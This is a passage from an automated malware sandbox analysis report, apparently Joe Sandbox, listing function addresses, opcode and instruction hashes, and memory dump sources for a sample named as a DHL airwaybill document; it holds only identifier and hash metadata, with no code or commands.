                • Instruction ID: 1637bf34fde267f5e462a0f310eec72bc27fdf44ee722261f2ee410695a6aa8d
                • Opcode Fuzzy Hash: 28785a04a7f2bed318ecee0211be4b1408352f4246bbaf3f89fa17255d74bdad
                • Instruction Fuzzy Hash: C6119432640514EBCF26DB5DDD80F9A7BA8EB5A750F1140B5F2059B251D770D902C7A0
                Function 01B366B0 Relevance: .1, Instructions: 61COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 70a67ebf416bd96728ade8b3a0c5cbb212414228a57c828b8c226e446b32b0ca
                • Instruction ID: 566078febb10e860507b9ab42f97f18552674d8590032c4b026747df3f626c87
                • Opcode Fuzzy Hash: 70a67ebf416bd96728ade8b3a0c5cbb212414228a57c828b8c226e446b32b0ca
                • Instruction Fuzzy Hash: 5F11BC76A01205EBCB2ACF59C580A5ABBE8EBC4750B5240B9ED059B315E730EE10CBA0
                Function 01BCA8E4 Relevance: .1, Instructions: 61COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                • Instruction ID: 0dc8a9db0b5963b2d90a21536f79b900ef21e85345ae17d68e725309701df0a3
                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                • Instruction Fuzzy Hash: C9110436A00909AFDF1DCB68C845B9EBBF5EF84710F0582A9E84597340E771BD01CB80
                Function 01B00AD0 Relevance: .1, Instructions: 61COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                • Instruction ID: 9455ca560d8d22fa9cc98454c7e31ea8303a382d527f72094b80bd5fa91e5873
                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                • Instruction Fuzzy Hash: BC2106B5A00B059FD3A0CF29D440B52BBF4FB48B10F10892EE98AC7B40E371E814CB90
                Function 01B8E7E1 Relevance: .1, Instructions: 59COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                • Instruction ID: dab4f23e505ecbb7219aae4c9f718407aa0d8b3065b6ee7833765d245d57dc4a
                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                • Instruction Fuzzy Hash: 0811C232610601EFEB39AF49C844B5EBBE5EF45B54F0584A8EA099B160EB71DC40DB90
                Function 01B227ED Relevance: .1, Instructions: 58COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 909998d6418399ce2a1b865ee4b2cf2b9fb320ee7464ccd55156e35379aaee52
                • Instruction ID: 6147ee93e7f72b8f7e25ff1db3b82fafc60154ad751b78bc515dce24ee48b99e
                • Opcode Fuzzy Hash: 909998d6418399ce2a1b865ee4b2cf2b9fb320ee7464ccd55156e35379aaee52
                • Instruction Fuzzy Hash: C9010431205685ABEB1EA67D9C84F277A8CEFA0690F0501E5F904DB250DB58DC04C271
                Function 01B04690 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 04c256c9fab69b219e7de0241129c921171b5241214935c8c9cd36acf0b46375
                • Instruction ID: f466c0635ebfcf640ab198e76cfc4b878de06b6569395c2f0e5ed797101b45fc
                • Opcode Fuzzy Hash: 04c256c9fab69b219e7de0241129c921171b5241214935c8c9cd36acf0b46375
                • Instruction Fuzzy Hash: 0411A036200645AFDB2BCF5DD940B567FA8EB86764F004299FA048B6A0C770E800CF60
                Function 01BD4B00 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ae951af2ef4554ab0f948aab22bb206126e064341d7ccb51320fa48a60a2e26
                • Instruction ID: 6a0902ba307b03f32a2025cb97755c8eb55ce1d785f3a147386fadd89148bb05
                • Opcode Fuzzy Hash: 5ae951af2ef4554ab0f948aab22bb206126e064341d7ccb51320fa48a60a2e26
                • Instruction Fuzzy Hash: 431106322006119FDB2D9B29D840F26B7A6FFD4310F1545A9E686C7A50EB30A802CB90
                Function 01B36620 Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24f9668ceb42743fa9abcea0e4308d6177cb6bcde674bb5098212b89c9d9a460
                • Instruction ID: 87536961a04ad232ea923afd6ae8739c1063eb1a72cb3f84c919ab29c084f95f
                • Opcode Fuzzy Hash: 24f9668ceb42743fa9abcea0e4308d6177cb6bcde674bb5098212b89c9d9a460
                • Instruction Fuzzy Hash: 9711E572A00715BBDB2ADF59C9C0B9EFBB8FF84790F510098EA01A7244D730AE119B60
                Function 01B2EA2E Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a2c38d9f104fbfbde7e1077c6b11288a4c2627bbbcfe4fe8faabbe345fc21b86
                • Instruction ID: 62516a62790e7c96356e9c3be9644a68e2a249d211bbae90716b6ce0141f5d4a
                • Opcode Fuzzy Hash: a2c38d9f104fbfbde7e1077c6b11288a4c2627bbbcfe4fe8faabbe345fc21b86
                • Instruction Fuzzy Hash: 7F0192755011099FC729DB1AD444F16BBF9EB96314F2185AEE1098B2A4C770DC46CB90
                Function 01B2E53E Relevance: .1, Instructions: 55COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                • Instruction ID: cc85d1bb3e6a0cc2d991b0e9a91657a7e464a72149ccc75ccbeb860224b524ee
                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                • Instruction Fuzzy Hash: ED112F722126D19FEB2B975DD564B3577E8FF10754F1900E4DD4587692F32CC841C250
                Function 01B8E75D Relevance: .1, Instructions: 54COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                • Instruction ID: 9ad2482bb7af0e320bba9a4e8e6f3a0a431acc9a0b5a588c40bb55bd594baa36
                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                • Instruction Fuzzy Hash: FA01923A601105AFEB29BF58CC00F5A7EA9EB95F50F0585A4EA059B260E771DD40C790
                Function 01AFA250 Relevance: .1, Instructions: 52COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                • Instruction ID: 4024d5f8d282e75a8d0afbc5172cea53ee086580c766fc61587e4f8493e5728f
                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                • Instruction Fuzzy Hash: 42012636604B219BCB318F99E840AB27BB8EF55770700852DFED98B2A1C731D400CBA0
                Function 01BD4940 Relevance: .1, Instructions: 52COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 147ba6f61c8e22daac0fb1c4d2ac3511c4da58797e271523dd72329ae898b1b0
                • Instruction ID: f9d653e9f38d952bc0c527e2134dffbccb6fac82d47df3c69b188cba8205119a
                • Opcode Fuzzy Hash: 147ba6f61c8e22daac0fb1c4d2ac3511c4da58797e271523dd72329ae898b1b0
                • Instruction Fuzzy Hash: 130126325412019FC73EDF1DC844E12BBA8EB81370B2542D5E9689B5AAF734D801C7C0
                Function 01B7E1D0 Relevance: .1, Instructions: 51COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aef6d41181ae6b2cd64a369aa1c798f77776358a9d7a0badb88528d06a41761e
                • Instruction ID: c92acedfe0f3b83327463373dde8e069586068c3f36a986cea77f16065ae3901
                • Opcode Fuzzy Hash: aef6d41181ae6b2cd64a369aa1c798f77776358a9d7a0badb88528d06a41761e
                • Instruction Fuzzy Hash: D6118E31241241EFDB1AAF19C980F16BBB8FF58B54F1000E9E9059B6A1C735ED01CA90
                Function 01B06259 Relevance: .1, Instructions: 51COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c63409b228e81b8d30e56252bfded63ee02f07929c51690d371b1bc2a1072714
                • Instruction ID: 07814d6ffe539f9ab71716ee83fadd2ac2e036fb46cc38469bd9fc4f3dba581a
                • Opcode Fuzzy Hash: c63409b228e81b8d30e56252bfded63ee02f07929c51690d371b1bc2a1072714
                • Instruction Fuzzy Hash: 1F114870641229ABDF2AAB64CD42FE9B7B4AB18710F5081D4B318E61E1DB709A91DF84
                Function 01B0208A Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                • Instruction ID: c2dd7ed6a089408ad1276295f3681269cfbb1d620d43fd826a9661fd0cffc4ac
                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                • Instruction Fuzzy Hash: 2601F5322002108BEF1EDB1DD884B62BB6BFFC8610F5545E9ED05CF296EB718885C390
                Function 01B86050 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 384dc6906c1d6d2fe92adb9c4729a0bbf77350d097ae6d0f0020d5e90797369d
                • Instruction ID: fe69931b47fb81c2064c9a3da547513ec65faf062ac2c3cdb5271e09f6c9d95b
                • Opcode Fuzzy Hash: 384dc6906c1d6d2fe92adb9c4729a0bbf77350d097ae6d0f0020d5e90797369d
                • Instruction Fuzzy Hash: 3D110576900019ABCB26EB94CC80EDFBB7DEF48354F054166A906A7211EB34AA15CBA0
                Function 01B96500 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad44136342d38aa4a0719577ca24c061470f93118235210db5f6d58190526932
                • Instruction ID: 021ae808aec5dceedb0cdbdfa17b1355c9e7c57752c8cceab6fa52b75b226269
                • Opcode Fuzzy Hash: ad44136342d38aa4a0719577ca24c061470f93118235210db5f6d58190526932
                • Instruction Fuzzy Hash: 3611C8766441499FDB15CF58D410BA5BBB9FB56314F0981A9E844CB325D731EC41CBA0
                Function 01B8C810 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc766e423330d37f5a5cd7d71b8658976697c4165220a63b39673da24d7c3a99
                • Instruction ID: c3c20912ac44779d32a88ba505dfb83261356e394a764be1be5cd03fc3b07fe9
                • Opcode Fuzzy Hash: fc766e423330d37f5a5cd7d71b8658976697c4165220a63b39673da24d7c3a99
                • Instruction Fuzzy Hash: 91111CB1A00209DFCB04DF99D581AAEBBF4FF58250F14806AE905E7351D774EA01CBA4
                Function 01BAEA60 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b293b908f90ad14cf2684fc401cf0813f9c1b991adae4017154cc68d9810d67f
                • Instruction ID: 72c8310444ebd20e702dcacb92503b20dbc93c37c600ba2beaf3e376baab880d
                • Opcode Fuzzy Hash: b293b908f90ad14cf2684fc401cf0813f9c1b991adae4017154cc68d9810d67f
                • Instruction Fuzzy Hash: 1901D8351442119BCB3EAB15C450D3ABBBAFF51650B9544EEE6455B221C730EC41CB91
                Function 01B420F0 Relevance: .0, Instructions: 49COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc6f29690f6cfd132af0d3cbf34b50f42bae2ad8518c54a24421974d17775495
                • Instruction ID: fd2341c4417dddc6ce03cd650f0b98bf50326f3b9038f230c641d236a3d6ef68
                • Opcode Fuzzy Hash: dc6f29690f6cfd132af0d3cbf34b50f42bae2ad8518c54a24421974d17775495
                • Instruction Fuzzy Hash: 48118C75A0120DAFDF09EFA5D850FAE7BB5EB44740F0080D9FA119B290EB35AE11DB90
                Function 01AFC020 Relevance: .0, Instructions: 49COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                • Instruction ID: d579a6b9ccee3f9005b9a7469a84400b7b41cf3dababccedab3442d7c8db07c5
                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                • Instruction Fuzzy Hash: 9801F5321007099FEF26A7AAD800FA777F9FFC5224F04499DAA468B554EB70E402C750
                Function 01B3E5CF Relevance: .0, Instructions: 49COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7e93e858388f1cfdd332abf9d41d14588cdb054a69bc3ebdc0fdaf5283bffcd5
                • Instruction ID: 99c518fab6468843e2f9d28a87e86fcfd0bdbc2296bdca2e8d4292d7d996611b
                • Opcode Fuzzy Hash: 7e93e858388f1cfdd332abf9d41d14588cdb054a69bc3ebdc0fdaf5283bffcd5
                • Instruction Fuzzy Hash: 3901D471200601BBC719BB29CD80E53B7ACFB94664B0106AAB60983560EB24EC01C6A0
                Function 01B969C0 Relevance: .0, Instructions: 49COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 81639df320a62a455a8d4cc50e552f7629a861b6d6416808d5780adc55c523b5
                • Instruction ID: 65d846b35ee2d67a7c0420c32c9718d2853b288de337b18a318235dad46e0c16
                • Opcode Fuzzy Hash: 81639df320a62a455a8d4cc50e552f7629a861b6d6416808d5780adc55c523b5
                • Instruction Fuzzy Hash: A1014C322142069BCB28DF6AC888AA7BBE8FF44720F514279E95887190E7349902C7D1
                Function 01B8C460 Relevance: .0, Instructions: 48COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 46f70e073004eaf42a4df1655255be861934909b6d61f669ded7209a3184edee
                • Instruction ID: 46a2a81a62c6f7f202dd54d188c2c868470589229837b956c1ddb942c111ea6e
                • Opcode Fuzzy Hash: 46f70e073004eaf42a4df1655255be861934909b6d61f669ded7209a3184edee
                • Instruction Fuzzy Hash: 3B115BB1A01209ABDF19EFA8C840EEE7BB5EB48650F044099F90197350DB34E951DBA0
                Function 01B8C97C Relevance: .0, Instructions: 48COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7a2f2a0ff265d0875fbb13bc038ad6ac4919629ce7920bcbe186d4ac5d768fe9
                • Instruction ID: 7d2f5737805c5c00ad6ca3ea63a035da860cc1165d663dded3e5e2f5c99fc7ee
                • Opcode Fuzzy Hash: 7a2f2a0ff265d0875fbb13bc038ad6ac4919629ce7920bcbe186d4ac5d768fe9
                • Instruction Fuzzy Hash: BA1179B16083089FC704DF69C441A9BBBE4EF98710F00859EF998D73A1E730E900CBA2
                Function 01BD4A80 Relevance: .0, Instructions: 48COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                • Instruction ID: 5770dbb01f2d9072c8553493bcb301dbc0dcf355b22b80d0af7effaae6712eed
                • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                • Instruction Fuzzy Hash: DC01D4322006029FDB2D9A6DD844F96BBEAFBC5310F444899F6468BA50FBB0F840C795
                Function 01B8CA11 Relevance: .0, Instructions: 48COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75368b1ee92f757241a2fabd64c5b3b7f81a8c31a2f002389ed1d7b748bfc919
                • Instruction ID: 72516d079a9b829bf09da3c86393e903435eeb1f3c34041eb27df4ae2f24b13b
                • Opcode Fuzzy Hash: 75368b1ee92f757241a2fabd64c5b3b7f81a8c31a2f002389ed1d7b748bfc919
                • Instruction Fuzzy Hash: 1E1157B16083089FC704DF69C441A9ABBE4EF99750F00855AB998D73A4E730E900CBA2
                Function 01B1E016 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                • Instruction ID: d71867541bc2c8e98b30d170c6dcb37533354df5484f04fbd1f67bb126fc0231
                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                • Instruction Fuzzy Hash: 21017C32200580DFE32BD71DC988F267BE8EB48B54F4A04E1FD05CB6A2D768DD40C625
                Function 01AF826B Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fa0a0ac8e5e45efc874930ab64f74c6fa571d0846a45b7ead7714a79188f2925
                • Instruction ID: 2821a44a55ea1d53603bad90f11d9928f7546b91cf38b530c9936fd43de2cb2c
                • Opcode Fuzzy Hash: fa0a0ac8e5e45efc874930ab64f74c6fa571d0846a45b7ead7714a79188f2925
                • Instruction Fuzzy Hash: 5601A775701505EFDB18EBADDD449AEB7F9FF41610B19406DEA0197640DF30ED02C690
                Function 01BAEB50 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: efb233684cce5d3be405ef21db89e5c6f8e127a045bda90f6a48bc96ac1988c1
                • Instruction ID: 08d90fd66a2112eea18ad69aa60a3f5bac1b801733c43ae578db076ce2d9cde4
                • Opcode Fuzzy Hash: efb233684cce5d3be405ef21db89e5c6f8e127a045bda90f6a48bc96ac1988c1
                • Instruction Fuzzy Hash: E001A272284701AFD7395B1AD881F02BAA8EF95B50F5144AEF7069F3A0D7B0E840CB94
                Function 01B02582 Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c235aedf9b72e66c79ae1319d3b24007ab36dc7665f5064e8108fd2599f0536f
                • Instruction ID: da4bad89edc45b317994fe07282e53a095f41a24b1b3ffee3c89220da7751155
                • Opcode Fuzzy Hash: c235aedf9b72e66c79ae1319d3b24007ab36dc7665f5064e8108fd2599f0536f
                • Instruction Fuzzy Hash: 14F0F932641710BBC73A9B568C44F57BEADEB84B90F1140A8AA0597650D730ED05C7A0
                Function 01B2C073 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                • Instruction ID: 3edd3d271e664d8e2532487f5da0140bd2e946f4d63da6b6b52c1f9deac0e974
                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                • Instruction Fuzzy Hash: FEF0AFB2A00621ABD328CF4D9840E57FBEADBD5A80F058169E509C7220EA31DD04CB90
                Function 01AFC310 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
